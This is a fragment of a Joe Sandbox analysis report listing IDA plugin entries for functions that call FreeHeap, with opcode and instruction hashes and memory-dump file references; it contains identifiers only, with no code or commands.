                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: 62b07dad704196574e9eed14e7c25d34d38e653719c57334b845a6fea6853802
                                            • Instruction ID: 9a094185f4e222b1b654f1c962791a4d3df25bdcaf513abdb48c8498ea06ea21
                                            • Opcode Fuzzy Hash: 62b07dad704196574e9eed14e7c25d34d38e653719c57334b845a6fea6853802
                                            • Instruction Fuzzy Hash: 0521331590CA5181E724DB26D0E43BD67A0FB89B94F0C40B6DA8EA7BA5CF7CE184D744
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: 6dd0b0dabbf7f5e32c28944eb291f706c6de950cde95f464c99b891f1199d392
                                            • Instruction ID: c599cc8129d5f264d32f52e1bd5d6e9afb57111b376154ae5bec947dc4f442ad
                                            • Opcode Fuzzy Hash: 6dd0b0dabbf7f5e32c28944eb291f706c6de950cde95f464c99b891f1199d392
                                            • Instruction Fuzzy Hash: C021511590CB4281E724DB26D0E43B967A0FB89B94F0C40B6DA8EA7BA5CF7CE084D344
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: b03cd847145791211c481527e7a32ee2cbf64813f2701fc5ff3e8c4b93c52ab6
                                            • Instruction ID: 96cff3df7636f4b2ca0cc3f4ed6871ba3c2c775621d8b5be7f596d63ea715190
                                            • Opcode Fuzzy Hash: b03cd847145791211c481527e7a32ee2cbf64813f2701fc5ff3e8c4b93c52ab6
                                            • Instruction Fuzzy Hash: E921541590CB4181E724DB26D0E43B967A0FB85B94F0C40B6DA8EA77A5CF7CE084D344